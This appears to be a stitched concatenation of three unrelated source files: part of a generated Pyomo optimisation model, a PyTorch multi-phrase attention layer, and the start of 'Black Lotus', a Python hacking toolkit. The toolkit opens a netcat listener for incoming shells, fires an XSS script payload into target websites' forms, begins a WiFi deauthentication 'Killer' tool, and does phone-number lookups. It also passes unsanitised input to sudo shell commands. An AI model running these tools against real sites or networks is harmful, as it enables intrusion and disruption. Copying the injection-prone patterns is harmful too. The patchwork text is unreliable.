m.c1559 = Constraint(expr= - 50*m.x130 + m.x258 <= 0)
m.c1560 = Constraint(expr= - 50*m.x131 + m.x259 <= 0)
m.c1561 = Constraint(expr= - 50*m.x132 + m.x260 <= 0)
m.c1562 = Constraint(expr= - 50*m.x133 + m.x261 <= 0)
m.c1563 = Constraint(expr= - 50*m.x134 + m.x262 <= 0)
m.c1564 = Constraint(expr= - 50*m.x135 + m.x263 <= 0)
m.c1565 = Constraint(expr= - 50*m.x136 + m.x264 <= 0)
m.c1566 = Constraint(expr= - 50*m.x137 + m.x265 <= 0)
m.c1567 = Constraint(expr= - 50*m.x138 + m.x266 <= 0)
m.c1568 = Constraint(expr= - 50*m.x139 + m.x267 <= 0)
m.c1569 = Constraint(expr= - 50*m.x140 + m.x268 <= 0)
m.c1570 = Constraint(expr= - 50*m.x141 + m.x269 <= 0)
m.c1571 = Constraint(expr= - 50*m.x142 + m.x270 <= 0)
m.c1572 = Constraint(expr= - 50*m.x143 + m.x271 <= 0)
m.c1573 = Constraint(expr= - 50*m.x144 + m.x272 <= 0)
m.c1574 = Constraint(expr= - 50*m.x145 + m.x273 <= 0)
m.c1575 = Constraint(expr= - 50*m.x146 + m.x274 <= 0)
m.c1576 = Constraint(expr= - 50*m.x147 + m.x275 <= 0)
m.c1577 = Constraint(expr= - 50*m.x148 + m.x276 <= 0)
m.c1578 = Constraint(expr= - 50*m.x149 + m.x277 <= 0)
m.c1579 = Constraint(expr= - 50*m.x150 + m.x278 <= 0)
m.c1580 = Constraint(expr= - 50*m.x151 + m.x279 <= 0)
m.c1581 = Constraint(expr= - 50*m.x152 + m.x280 <= 0)
m.c1582 = Constraint(expr= - 50*m.x153 + m.x281 <= 0)
m.c1583 = Constraint(expr= - 50*m.x154 + m.x282 <= 0)
m.c1584 = Constraint(expr= - 50*m.x155 + m.x283 <= 0)
m.c1585 = Constraint(expr= - 50*m.x156 + m.x284 <= 0)
m.c1586 = Constraint(expr= - 50*m.x157 + m.x285 <= 0)
m.c1587 = Constraint(expr= - 50*m.x158 + m.x286 <= 0)
m.c1588 = Constraint(expr= - 50*m.x159 + m.x287 <= 0)
m.c1589 = Constraint(expr= - 50*m.x160 + m.x288 <= 0)
m.c1590 = Constraint(expr= - 50*m.x161 + m.x289 <= 0)
m.c1591 = Constraint(expr= - 50*m.x162 + m.x290 <= 0)
m.c1592 = Constraint(expr= - 50*m.x163 + m.x291 <= 0)
m.c1593 = Constraint(expr= - 50*m.x164 + m.x292 <= 0)
m.c1594 = Constraint(expr= - 50*m.x165 + m.x293 <= 0)
m.c1595 = Constraint(expr= - 50*m.x166 + m.x294 <= 0)
m.c1596 = Constraint(expr= - 50*m.x167 + m.x295 <= 0)
m.c1597 = Constraint(expr= - 50*m.x168 + m.x296 <= 0)
m.c1598 = Constraint(expr= - 50*m.x169 + m.x297 <= 0)
m.c1599 = Constraint(expr= - 50*m.x170 + m.x298 <= 0)
m.c1600 = Constraint(expr= - 50*m.x171 + m.x299 <= 0)
m.c1601 = Constraint(expr= - 50*m.x172 + m.x300 <= 0)
m.c1602 = Constraint(expr= - 50*m.x173 + m.x301 <= 0)
m.c1603 = Constraint(expr= - 50*m.x174 + m.x302 <= 0)
m.c1604 = Constraint(expr= - 50*m.x175 + m.x303 <= 0)
m.c1605 = Constraint(expr= - 50*m.x176 + m.x304 <= 0)
m.c1606 = Constraint(expr= - 50*m.x177 + m.x305 <= 0)
m.c1607 = Constraint(expr= - 50*m.x178 + m.x306 <= 0)
m.c1608 = Constraint(expr= - 50*m.x179 + m.x307 <= 0)
m.c1609 = Constraint(expr= - 50*m.x180 + m.x308 <= 0)
m.c1610 = Constraint(expr= - 50*m.x181 + m.x309 <= 0)
m.c1611 = Constraint(expr= - 50*m.x182 + m.x310 <= 0)
m.c1612 = Constraint(expr= - 50*m.x183 + m.x311 <= 0)
m.c1613 = Constraint(expr= - 50*m.x184 + m.x312 <= 0)
m.c1614 = Constraint(expr= - 50*m.x185 + m.x313 <= 0)
m.c1615 = Constraint(expr= - 50*m.x186 + m.x314 <= 0)
m.c1616 = Constraint(expr= - 50*m.x187 + m.x315 <= 0)
m.c1617 = Constraint(expr= - 50*m.x188 + m.x316 <= 0)
m.c1618 = Constraint(expr= - 50*m.x189 + m.x317 <= 0)
m.c1619 = Constraint(expr= - 50*m.x190 + m.x318 <= 0)
m.c1620 = Constraint(expr= - 50*m.x191 + m.x319 <= 0)
m.c1621 = Constraint(expr= - 50*m.x192 + m.x320 <= 0)
m.c1622 = Constraint(expr= - 50*m.x193 + m.x321 <= 0)
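# The two blocks above (c1515-c1558 and c1559-c1622) are a standard
# semicontinuous linking pattern: for a binary y and a continuous x paired at
# a fixed index offset of 128, they enforce "x = 0 or 5 <= x <= 50" (only a
# subset of pairs carries the 5*y lower bound; the rest are plain x >= 0).
# A hedged sketch of the same pattern with an indexed Var/Constraint, had the
# model been written by hand rather than generated:
#
#   BIN = range(130, 194)                          # binary indices, inferred
#   def lb_rule(m, j):
#       return m.x[j + 128] >= 5 * m.x[j]          # x >= 5*y
#   def ub_rule(m, j):
#       return m.x[j + 128] <= 50 * m.x[j]         # x <= 50*y (big-M)
#   m.link_lb = Constraint(BIN, rule=lb_rule)
#   m.link_ub = Constraint(BIN, rule=ub_rule)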
m.c1623 = Constraint(expr= m.x136 + m.x137 + m.x144 + m.x145 + m.x152 + m.x153 + m.x160 + m.x161 + m.x168 + m.x169
+ m.x176 + m.x177 + m.x184 + m.x185 + m.x192 + m.x193 == 8)
m.c1624 = Constraint(expr= m.x264 + m.x272 + m.x280 + m.x288 + m.x296 + m.x304 + m.x312 + m.x320 >= 100)
m.c1625 = Constraint(expr= m.x265 + m.x273 + m.x281 + m.x289 + m.x297 + m.x305 + m.x313 + m.x321 >= 100)
m.c1626 = Constraint(expr= m.x264 + m.x272 + m.x280 + m.x288 + m.x296 + m.x304 + m.x312 + m.x320 <= 100)
m.c1627 = Constraint(expr= m.x265 + m.x273 + m.x281 + m.x289 + m.x297 + m.x305 + m.x313 + m.x321 <= 100)
m.c1628 = Constraint(expr= - 0.15*m.x264 + 0.1*m.x346 + 0.6*m.x347 + 0.2*m.x348 + 0.5*m.x349 >= 0)
m.c1629 = Constraint(expr= - 0.45*m.x265 + 0.1*m.x350 + 0.6*m.x351 + 0.2*m.x352 + 0.5*m.x353 >= 0)
m.c1630 = Constraint(expr= - 0.15*m.x272 + 0.1*m.x378 + 0.6*m.x379 + 0.2*m.x380 + 0.5*m.x381 >= 0)
m.c1631 = Constraint(expr= - 0.45*m.x273 + 0.1*m.x382 + 0.6*m.x383 + 0.2*m.x384 + 0.5*m.x385 >= 0)
m.c1632 = Constraint(expr= - 0.15*m.x280 + 0.1*m.x410 + 0.6*m.x411 + 0.2*m.x412 + 0.5*m.x413 >= 0)
m.c1633 = Constraint(expr= - 0.45*m.x281 + 0.1*m.x414 + 0.6*m.x415 + 0.2*m.x416 + 0.5*m.x417 >= 0)
m.c1634 = Constraint(expr= - 0.15*m.x288 + 0.1*m.x442 + 0.6*m.x443 + 0.2*m.x444 + 0.5*m.x445 >= 0)
m.c1635 = Constraint(expr= - 0.45*m.x289 + 0.1*m.x446 + 0.6*m.x447 + 0.2*m.x448 + 0.5*m.x449 >= 0)
m.c1636 = Constraint(expr= - 0.15*m.x296 + 0.1*m.x474 + 0.6*m.x475 + 0.2*m.x476 + 0.5*m.x477 >= 0)
m.c1637 = Constraint(expr= - 0.45*m.x297 + 0.1*m.x478 + 0.6*m.x479 + 0.2*m.x480 + 0.5*m.x481 >= 0)
m.c1638 = Constraint(expr= - 0.15*m.x304 + 0.1*m.x506 + 0.6*m.x507 + 0.2*m.x508 + 0.5*m.x509 >= 0)
m.c1639 = Constraint(expr= - 0.45*m.x305 + 0.1*m.x510 + 0.6*m.x511 + 0.2*m.x512 + 0.5*m.x513 >= 0)
m.c1640 = Constraint(expr= - 0.15*m.x312 + 0.1*m.x538 + 0.6*m.x539 + 0.2*m.x540 + 0.5*m.x541 >= 0)
m.c1641 = Constraint(expr= - 0.45*m.x313 + 0.1*m.x542 + 0.6*m.x543 + 0.2*m.x544 + 0.5*m.x545 >= 0)
m.c1642 = Constraint(expr= - 0.15*m.x320 + 0.1*m.x570 + 0.6*m.x571 + 0.2*m.x572 + 0.5*m.x573 >= 0)
m.c1643 = Constraint(expr= - 0.45*m.x321 + 0.1*m.x574 + 0.6*m.x575 + 0.2*m.x576 + 0.5*m.x577 >= 0)
m.c1644 = Constraint(expr= - 0.25*m.x264 + 0.1*m.x346 + 0.6*m.x347 + 0.2*m.x348 + 0.5*m.x349 <= 0)
m.c1645 = Constraint(expr= - 0.55*m.x265 + 0.1*m.x350 + 0.6*m.x351 + 0.2*m.x352 + 0.5*m.x353 <= 0)
m.c1646 = Constraint(expr= - 0.25*m.x272 + 0.1*m.x378 + 0.6*m.x379 + 0.2*m.x380 + 0.5*m.x381 <= 0)
m.c1647 = Constraint(expr= - 0.55*m.x273 + 0.1*m.x382 + 0.6*m.x383 + 0.2*m.x384 + 0.5*m.x385 <= 0)
m.c1648 = Constraint(expr= - 0.25*m.x280 + 0.1*m.x410 + 0.6*m.x411 + 0.2*m.x412 + 0.5*m.x413 <= 0)
m.c1649 = Constraint(expr= - 0.55*m.x281 + 0.1*m.x414 + 0.6*m.x415 + 0.2*m.x416 + 0.5*m.x417 <= 0)
m.c1650 = Constraint(expr= - 0.25*m.x288 + 0.1*m.x442 + 0.6*m.x443 + 0.2*m.x444 + 0.5*m.x445 <= 0)
m.c1651 = Constraint(expr= - 0.55*m.x289 + 0.1*m.x446 + 0.6*m.x447 + 0.2*m.x448 + 0.5*m.x449 <= 0)
m.c1652 = Constraint(expr= - 0.25*m.x296 + 0.1*m.x474 + 0.6*m.x475 + 0.2*m.x476 + 0.5*m.x477 <= 0)
m.c1653 = Constraint(expr= - 0.55*m.x297 + 0.1*m.x478 + 0.6*m.x479 + 0.2*m.x480 + 0.5*m.x481 <= 0)
m.c1654 = Constraint(expr= - 0.25*m.x304 + 0.1*m.x506 + 0.6*m.x507 + 0.2*m.x508 + 0.5*m.x509 <= 0)
m.c1655 = Constraint(expr= - 0.55*m.x305 + 0.1*m.x510 + 0.6*m.x511 + 0.2*m.x512 + 0.5*m.x513 <= 0)
m.c1656 = Constraint(expr= - 0.25*m.x312 + 0.1*m.x538 + 0.6*m.x539 + 0.2*m.x540 + 0.5*m.x541 <= | |
x = torch.arange(0., seq_length, device=device).repeat(bsz, seq_len, phrase_num, 1)
y = gauss_distribution(mus, sigmas, x) * weights
y = y.sum(dim=-2)
gauss_attention = y
return gauss_attention
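# gauss_distribution is defined outside this excerpt; a minimal sketch
# consistent with its use above (a per-phrase Gaussian profile over key
# positions, later weighted and summed over the phrase dimension) would be
# the normal pdf, broadcasting mu/sigma of shape (bsz, seq_len, phrase_num, 1)
# against x of shape (bsz, seq_len, phrase_num, seq_length):
#
#   import math
#   def gauss_distribution(mu, sigma, x):
#       return torch.exp(-0.5 * ((x - mu) / sigma) ** 2) / (sigma * math.sqrt(2 * math.pi))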
def forward(
self,
query,
key: Optional[Tensor],
value: Optional[Tensor],
key_padding_mask: Optional[Tensor] = None,
incremental_state: Optional[Dict[str, Dict[str, Optional[Tensor]]]] = None,
need_weights: bool = True,
static_kv: bool = False,
attn_mask: Optional[Tensor] = None,
before_softmax: bool = False,
need_head_weights: bool = False,
phrase_info: Optional[dict] = None,
need_phrase: bool = False,
) -> Tuple[Tensor, Optional[Tensor]]:
"""Input shape: Time x Batch x Channel
Args:
key_padding_mask (ByteTensor, optional): mask to exclude
keys that are pads, of shape `(batch, src_len)`, where
padding elements are indicated by 1s.
need_weights (bool, optional): return the attention weights,
averaged over heads (default: True).
attn_mask (ByteTensor, optional): typically used to
implement causal attention, where the mask prevents the
attention from looking forward in time (default: None).
before_softmax (bool, optional): return the raw attention
weights and values before the attention softmax.
need_head_weights (bool, optional): return the attention
weights for each head. Implies *need_weights*. Default:
return the average attention weights over all heads.
query: tokens(source side: seq, bsz, embed_dim)
key: phrase repr
value: tokens(source/target side)
phrase_info (dict, optional): used for phrase parsing
need_phrase (bool, optional): return the phrase repr (default: False)
"""
if need_head_weights:
need_weights = True
key_phrase = None
tgt_len, bsz, embed_dim = query.size()
assert embed_dim == self.embed_dim
assert list(query.size()) == [tgt_len, bsz, embed_dim]
if incremental_state is not None:
saved_state = self._get_input_buffer(incremental_state)
if saved_state is not None and "prev_key" in saved_state:
# previous time steps are cached - no need to recompute
# key and value if they are static
if static_kv:
assert self.encoder_decoder_attention and not self.self_attention
key = value = None
else:
saved_state = None
# Here in self_attention, only query is needed
# project should be applied before multiheads
if self.self_attention:
if(self.multihead_attention):
q_base = self.q_proj_base(query)
k_base = self.k_proj_base(query)
if(self.gaussian_attention):
q_gauss = self.q_proj_gauss(query)
k_gauss = self.k_proj_gauss(query)
v = self.v_proj(query)
# In encoder_decoder attention, phrase(k) and token(v) are provided by encoder
# while token(q) is provided by decoder
elif self.encoder_decoder_attention:
# Basic multihead attention's k&v are provided by encoder and k = v
if(self.multihead_attention):
q_base = self.q_proj_base(query)
if key is None:
assert value is None
k_base = v = None
else:
k_base = self.k_proj_base(key)
v = self.v_proj(key)
# Gaussian attention's key & value are provided by the encoder, but key != value
# Note that there is no need to build phrases in the decoder: that is done by the encoder
if(self.gaussian_attention):
q_gauss = self.q_proj_gauss(query)
if key is None:
assert value is None
k_gauss = v = None
else:
assert key is not None
assert value is not None
k_gauss = self.k_proj_gauss(key)
v = self.v_proj(value)
else:
# Note:
# If both key and value are provided and apply_phrase is False,
# we assume that key is already the phrase repr,
# i.e. no PhraseEncoder is applied here
assert key is not None and value is not None
if(self.multihead_attention):
q_base = self.q_proj_base(query)
k_base = self.k_proj_base(key)
if(self.gaussian_attention):
q_gauss = self.q_proj_gauss(query)
k_gauss = self.k_proj_gauss(key)
v = self.v_proj(value)
if(self.multihead_attention):
q_base *= self.scaling
if(self.gaussian_attention):
q_gauss *= self.scaling
if self.bias_k_base is not None:
k_base = torch.cat([k_base, self.bias_k_base.repeat(1, bsz, 1)])
if self.bias_k_gauss is not None:
k_gauss = torch.cat([k_gauss, self.bias_k_gauss.repeat(1, bsz, 1)])
if self.bias_k_base is not None or self.bias_k_gauss is not None:
assert self.bias_v is not None
v = torch.cat([v, self.bias_v.repeat(1, bsz, 1)])
if attn_mask is not None:
attn_mask = torch.cat(
[attn_mask, attn_mask.new_zeros(attn_mask.size(0), 1)], dim=1
)
if key_padding_mask is not None:
key_padding_mask = torch.cat(
[
key_padding_mask,
key_padding_mask.new_zeros(
key_padding_mask.size(0), 1),
],
dim=1,
)
# embed_dim = head_dim * head_num
# q: (tgt_len, bsz, embed_dim) -> (bsz * head_num, tgt_len, head_dim)
# k: (phrase_num, bsz, embed_dim) -> (bsz * head_num, phrase_num, head_dim)
# v: (src_len, bsz, embed_dim) -> (bsz * head_num, src_len, head_dim)
# Note: the current implementation assumes a fixed window
# TODO graph based function is not supported yet
if(self.multihead_attention):
q_base = (
q_base.contiguous()
.view(tgt_len, bsz * self.num_heads, self.head_dim)
.transpose(0, 1)
)
if k_base is not None:
k_base = (
k_base.contiguous()
.view(-1, bsz * self.num_heads, self.head_dim)
.transpose(0, 1)
)
if(self.gaussian_attention):
q_gauss = (
q_gauss.contiguous()
.view(tgt_len, bsz * self.num_heads, self.head_dim)
.transpose(0, 1)
)
if k_gauss is not None:
k_gauss = (
k_gauss.contiguous()
.view(-1, bsz * self.num_heads, self.head_dim)
.transpose(0, 1)
)
if(self.apply_phrase):
key_phrase, phrase_info = self.phrase_encoder(k_gauss, phrase_info)
k_gauss = key_phrase
else:
key_phrase = k_gauss
if v is not None:
v = (
v.contiguous()
.view(-1, bsz * self.num_heads, self.head_dim)
.transpose(0, 1)
)
if saved_state is not None:
# saved states are stored with shape (bsz, num_heads, seq_len, head_dim)
# From saved_state get keys
if "prev_key_base" in saved_state:
assert self.multihead_attention
_prev_key_base = saved_state["prev_key_base"]
assert _prev_key_base is not None
prev_key_base = _prev_key_base.view(
bsz * self.num_heads, -1, self.head_dim)
if static_kv:
k_base = prev_key_base
else:
assert k_base is not None
k_base = torch.cat([prev_key_base, k_base], dim=1)
if "prev_key_gauss" in saved_state:
assert self.gaussian_attention
_prev_key_gauss = saved_state["prev_key_gauss"]
assert _prev_key_gauss is not None
prev_key_gauss = _prev_key_gauss.view(
bsz * self.num_heads, -1, self.head_dim)
if static_kv:
k_gauss = prev_key_gauss
else:
assert k_gauss is not None
k_gauss = torch.cat([prev_key_gauss, k_gauss], dim=1)
# From saved_state get values
if "prev_value" in saved_state:
_prev_value = saved_state["prev_value"]
assert _prev_value is not None
prev_value = _prev_value.view(
bsz * self.num_heads, -1, self.head_dim)
if static_kv:
v = prev_value
else:
assert v is not None
v = torch.cat([prev_value, v], dim=1)
# apply saved mask
prev_key_padding_mask: Optional[Tensor] = None
if "prev_key_padding_mask" in saved_state:
prev_key_padding_mask = saved_state["prev_key_padding_mask"]
assert v is not None
assert k_base is not None or k_gauss is not None
key_padding_mask = MultiPhraseAttention._append_prev_key_padding_mask(
key_padding_mask=key_padding_mask,
prev_key_padding_mask=prev_key_padding_mask,
batch_size=bsz,
# use whichever key tensor is present; k_base is None when only
# gaussian attention is enabled
src_len=(k_base if k_base is not None else k_gauss).size(1),
static_kv=static_kv,
)
# save the newest state
if(self.multihead_attention):
saved_state["prev_key_base"] = k_base.view(
bsz, self.num_heads, -1, self.head_dim)
if(self.gaussian_attention):
saved_state["prev_key_gauss"] = k_gauss.view(
bsz, self.num_heads, -1, self.head_dim)
saved_state["prev_value"] = v.view(
bsz, self.num_heads, -1, self.head_dim)
saved_state["prev_key_padding_mask"] = key_padding_mask
# In this branch incremental_state is never None
assert incremental_state is not None
incremental_state = self._set_input_buffer(
incremental_state, saved_state)
if(self.multihead_attention):
assert k_base is not None
src_len = k_base.size(1)
else:
assert k_gauss is not None
src_len = k_gauss.size(1)
# This is part of a workaround to get around fork/join parallelism
# not supporting Optional types.
if key_padding_mask is not None and key_padding_mask.dim() == 0:
key_padding_mask = None
if key_padding_mask is not None:
assert key_padding_mask.size(0) == bsz
assert key_padding_mask.size(1) == src_len
# calc multihead attention
if(self.multihead_attention):
base_attn = torch.bmm(q_base, k_base.transpose(1, 2))
else:
base_attn = None
# calc gaussian attention
if(self.gaussian_attention):
gauss_weight = torch.bmm(q_gauss, k_gauss.transpose(1, 2))
gauss_attn = self.gauss_builder_v2(
phrase_info['fixed_mu'], phrase_info['fixed_sigma'], gauss_weight, tgt_len)
if(base_attn is None):
base_attn = torch.zeros_like(gauss_attn)
else:
gauss_attn = torch.zeros_like(base_attn)
# add the two attentions together (adding after the softmax might work better)
gauss_attn = gauss_attn.to(base_attn.device)
attn_weights = gauss_attn + base_attn
attn_weights = MultiPhraseAttention.apply_sparse_mask(
attn_weights, tgt_len, src_len, bsz)
assert list(attn_weights.size()) == [
bsz * self.num_heads, tgt_len, src_len]
if attn_mask is not None:
attn_mask = attn_mask.unsqueeze(0)
if self.onnx_trace:
attn_mask = attn_mask.repeat(attn_weights.size(0), 1, 1)
attn_weights += attn_mask
if key_padding_mask is not None:
# don't attend to padding symbols
attn_weights = attn_weights.view(
bsz, self.num_heads, tgt_len, src_len)
attn_weights = attn_weights.masked_fill(
key_padding_mask.unsqueeze(1).unsqueeze(
2).to(torch.bool), float("-inf")
)
attn_weights = attn_weights.view(
bsz * self.num_heads, tgt_len, src_len)
if before_softmax:
return attn_weights, v
# apply softmax and dropout
attn_weights_float = utils.softmax(
attn_weights, dim=-1, onnx_trace=self.onnx_trace
)
attn_weights = attn_weights_float.type_as(attn_weights)
attn_probs = F.dropout(
attn_weights_float.type_as(attn_weights),
p=self.dropout,
training=self.training,
)
# apply attention
assert v is not None
attn = torch.bmm(attn_probs, v)
assert list(attn.size()) == [
bsz * self.num_heads, tgt_len, self.head_dim]
if self.onnx_trace and attn.size(1) == 1:
# when ONNX tracing a single decoder step (sequence length == 1)
# the transpose is a no-op copy before view, thus unnecessary
attn = attn.contiguous().view(tgt_len, bsz, embed_dim)
else:
attn = attn.transpose(0, 1).contiguous().view(
tgt_len, bsz, embed_dim)
attn = self.out_proj(attn)
attn_weights: Optional[Tensor] = None
if need_weights:
attn_weights = attn_weights_float.view(
bsz, self.num_heads, tgt_len, src_len
).transpose(1, 0)
if not need_head_weights:
# average attention weights over heads
attn_weights = attn_weights.mean(dim=0)
if(need_phrase):
assert key_phrase is not None
return attn, attn_weights, key_phrase
return attn, attn_weights
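# Hedged usage sketch for the forward pass above; the constructor arguments
# and tensor names are assumptions, not taken from this excerpt:
#
#   attn = MultiPhraseAttention(embed_dim=512, num_heads=8)   # ctor args assumed
#   out, weights = attn(query, key=phrase_repr, value=tokens,
#                       key_padding_mask=pad_mask,
#                       phrase_info={'fixed_mu': mu, 'fixed_sigma': sigma})
#   # query: (tgt_len, bsz, 512); out has the same shape after out_proj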
@staticmethod
def _append_prev_key_padding_mask(
key_padding_mask: Optional[Tensor],
prev_key_padding_mask: Optional[Tensor],
batch_size: int,
src_len: int,
static_kv: bool,
) -> Optional[Tensor]:
# saved key padding masks have shape (bsz, seq_len)
if prev_key_padding_mask is not None and static_kv:
new_key_padding_mask = prev_key_padding_mask
elif prev_key_padding_mask | |
<gh_stars>1-10
#!/usr/bin/env python3
#Black Lotus v2-dev-
#Copyright of <NAME>
#----------------------------------------------------------------------------------------------------------------------
import os
from getpass import getpass
import time
import sys
def login():
os.system('cls||clear')
usr = input("\033[37m Username\033[5;37m: \033[0;31m")
if usr =="black":
pas = getpass(prompt="\033[37m Password\033[5;37m: \033[0;31m")
if pas == "black":
os.system('cls||clear')
return  # login successful; continue to the main program
else:
print("\033[31mPassword is invalid")
print("\033[37m ")
time.sleep(1)
os.system('cls||clear')
sys.exit()
else:
print("\033[31mUsername is false or does not exist")
print("\033[37m ")
time.sleep(1)
os.system('cls||clear')
sys.exit()
login()
#----------------------------------------------------------------------------------------------------------------------
print("\033[37mLoading \033[31mBlack Lotus \n For Better experience set terminal to fullscreen\033[37m")
#----------------------------------------------------------------------------------------------------------------------
import time
import threading
import socket
import uuid
from pexpect import pxssh
import sys
import subprocess
from datetime import datetime
try:
import phonenumbers
from phonenumbers import geocoder, carrier
except:
os.system('pip install phonenumbers')
import phonenumbers
from phonenumbers import geocoder, carrier
import glob
import paramiko
import webbrowser
from PIL import Image
from PIL.ExifTags import TAGS
import re
try:
from requests_html import HTMLSession
except:
os.system('pip install requests_html')
from requests_html import HTMLSession
import requests
from pprint import pprint
from bs4 import BeautifulSoup as bs
from bs4 import BeautifulSoup
from urllib.parse import urlparse, urljoin
import colorama
from colorama import init
init()
try:
import pikepdf
except:
os.system('pip install pikepdf')
import pikepdf
from tqdm import tqdm
import zipfile
from tkinter import *
from scapy.all import *
#----------------------------------------------------------------------------------------------------------------------
def loading():
import time
import sys
animation = ["[\033[31m### \033[37m]","[\033[31m#### \033[37m]", "[\033[31m##### \033[37m]", "[\033[31m###### \033[37m]", "[\033[31m####### \033[37m]", "[\033[31m######## \033[37m]", "[\033[31m######### \033[37m]", "[\033[31m########## \033[37m]", "[\033[31m########### \033[37m]", "[\033[31m############\033[37m]"]
for i in range(len(animation)):
time.sleep(0.2)
sys.stdout.write("\r" + animation[i % len(animation)])
sys.stdout.flush()
print("\n")
print("\033[37m ")
loading()
#----------------------------------------------------------------------------------------------------------------------
#ESC [ 31 m # red
#ESC [ 32 m # green
#ESC [ 33 m # yellow
#ESC [ 34 m # blue
#ESC [ 35 m # magenta
#ESC [ 36 m # cyan
#ESC [ 37 m # white
#ESC [ 39 m # reset
#----------------------------------------------------------------------------------------------------------------------
def public_ip_addr():
import re
import json
from urllib.request import urlopen
url = 'http://ipinfo.io/json'
response = urlopen(url)
data = json.load(response)
ip=data['ip']
org=data['org']
city = data['city']
country=data['country']
region=data['region']
location=data['loc']
hostname=data['hostname']
print('\033[32mPublic IP Address Details\n \033[37m')
print('\033[37mIP: \033[32m', ip, '\033[37m\nRegion: \033[32m', region, '\033[37m\nCountry: \033[32m',country, '\033[37m\nCity: \033[32m',city, '\033[37m\nOrg: \033[32m', org, '\033[37m ')
print('\033[37mLocation: \033[32m', location)
print('\033[37mHostname: \033[32m', hostname)
print("\n\033[37m")
#----------------------------------------------------------------------------------------------------------------------
def host_details():
host = socket.gethostname()
ip = socket.gethostbyname(host)
time.sleep(0.2)
print("\n\033[36mHost Details")
print("\033[37m============")
print("\033[37m Host: \033[31m", host)
print("\033[37m Local IP:\033[31m ", ip)
print("\033[37m MAC: \033[31m", end="")
print (':'.join(['{:02x}'.format((uuid.getnode() >> ele) & 0xff)
for ele in range(0,8*6,8)][::-1]))
print("\033[37m============")
public_ip_addr()
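# The join expression above unpacks the 48-bit integer from uuid.getnode()
# into six bytes, most significant first. An equivalent, arguably clearer form:
#
#   node = uuid.getnode()
#   mac = ':'.join(f'{(node >> shift) & 0xff:02x}' for shift in range(40, -1, -8))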
#----------------------------------------------------------------------------------------------------------------------
def photo():
imagename = input("\033[37mEnter image path \033[31m>\033[37m ")
image = Image.open(imagename)
print(" ")
print("-------------------------")
exifdata = image.getexif()
for tag_id in exifdata:
tag = TAGS.get(tag_id, tag_id)
data = exifdata.get(tag_id)
if isinstance(data, bytes):
data = data.decode()
print(f"{tag:25}: {data}")
print(" ")
os.system('sudo exiftool ' + imagename)  # note the trailing space before the path
#----------------------------------------------------------------------------------------------------------------------
def phone_lookup():
p = input("\033[37mEnter Phone Number (with carrier number, like +30) \033[31m>\033[37m ")
phoneNumber = phonenumbers.parse(p)
Carrier = carrier.name_for_number(phoneNumber, 'en')
Region = geocoder.description_for_number(phoneNumber, 'en')
print("\n\033[37m====================")
print("\033[34mPhone Number details\033[37m")
print("\033[37m====================")
print("\033[37m# Phone number: \033[31m", p)
print("\033[37m# Carrier: \033[31m", Carrier)
print("\033[37m# Region: \033[31m", Region)
print("\033[37m ")
print("\033[31mDo you want to check the Phonebook for Greek Numbers?")
a = input("\033[31mThis may contain information about Name, Address and more (y/n)\033[37m ")
b = input("Open in megalodon's browser ? (y/n) ")
if b == "y":
a = "y"
elif b == "n":
print("\033[36mLink: \033[31mhttps://www.11888.gr/antistrofh-anazhthsh-me-arithmo-thlefwnou/ \033[37m")
a = "n"
else:
print("Get out of here")
if a == "y":
import tkinterweb
import tkinter as tk
root = tk.Tk()
root.title("Black Lotus Browser: Greek PhoneBook Searcher")
root.geometry("900x450+200+150")
frame = tkinterweb.HtmlFrame(root)
frame.load_website('https://www.11888.gr/antistrofh-anazhthsh-me-arithmo-thlefwnou/')
frame.pack(fill="both", expand=True)
root.mainloop()
else:
print(" ")
#----------------------------------------------------------------------------------------------------------------------
def listener():
b = input("\033[37mEnter Port \033[31m>\033[37m")
os.system("nc -lvnp " + b)
#----------------------------------------------------------------------------------------------------------------------
def xss():
def get_all_forms(url):
soup = bs(requests.get(url).content, "html.parser")
return soup.find_all("form")
def get_form_details(form):
details = {}
action = form.attrs.get("action").lower()
method = form.attrs.get("method", "get").lower()
inputs = []
for input_tag in form.find_all("input"):
input_type = input_tag.attrs.get("type", "text")
input_name = input_tag.attrs.get("name")
inputs.append({"type": input_type, "name": input_name})
details["action"] = action
details["method"] = method
details["inputs"] = inputs
return details
def submit_form(form_details, url, value):
target_url = urljoin(url, form_details["action"])
inputs = form_details["inputs"]
data = {}
for input in inputs:
if input["type"] == "text" or input["type"] == "search":
input["value"] = value
input_name = input.get("name")
input_value = input.get("value")
if input_name and input_value:
data[input_name] = input_value
if form_details["method"] == "post":
return requests.post(target_url, data=data)
else:
return requests.get(target_url, params=data)
def scan_xss(url):
forms = get_all_forms(url)
print(f"\033[37m[\033[31m+\033[37m] Detected {len(forms)} forms on \033[31m{url}\033[37m.")
js_script = "<script>alert('Black Lotus')</script>"
is_vulnerable = False
for form in forms:
form_details = get_form_details(form)
content = submit_form(form_details, url, js_script).content.decode()
if js_script in content:
print(f"\033[37m[\033[31m+\033[37m] XSS Detected on \033[31m{url}\033[37m")
print(f"\033[37m[\033[31m*\033[37m] Form details:\033[31m")
pprint(form_details)
is_vulnerable = True
return is_vulnerable
print("\033[37m ")
if __name__ == "__main__":
url = input("\033[37mEnter URL \033[31m>\033[37m ")
print(scan_xss(url))
print("\033[37m ")
#----------------------------------------------------------------------------------------------------------------------
def atom():
#!/usr/bin/env python3
import subprocess
import re
import csv
import os
import time
import shutil
from datetime import datetime
active_wireless_networks = []
def check_for_essid(essid, lst):
check_status = True
# If no ESSIDs in list add the row
if len(lst) == 0:
return check_status
for item in lst:
if essid in item["ESSID"]:
check_status = False
return check_status
print("""\033[37m
_______ /__/ \033[35m█████╗ ████████╗ ██████╗ ███╗ ███╗\033[37m
|.-----.| ,---[___]* \033[35m██╔══██╗╚══██╔══╝██╔═══██╗████╗ ████║\033[37m
|| || / \033[33mprinter\033[37m \033[35m███████║ ██║ ██║ ██║██╔████╔██║\033[37m
||_____|| _____ / ____ \033[35m██╔══██║ ██║ ██║ ██║██║╚██╔╝██║\033[37m
|o_____+| [o_+_+]--------[=i==] \033[35m██║ ██║ ██║ ╚██████╔╝██║ ╚═╝ ██║\033[37m
|_______| \033[32mwlan0\033[37m drive \033[35m╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝\033[37m
Wifi \033[31mKiller\033[37m
""")
if 'SUDO_UID' not in os.environ:
print("Run this program with sudo.")
sys.exit(1)
for file_name in os.listdir():
if ".csv" in file_name:
print("There shouldn't be any .csv files in your directory. We found .csv files in your directory.")
directory = os.getcwd()
try:
os.mkdir(directory + "/backup/")
except:
print("Backup folder exists.")
timestamp = datetime.now()
shutil.move(file_name, directory + "/backup/" + str(timestamp) + "-" + file_name)
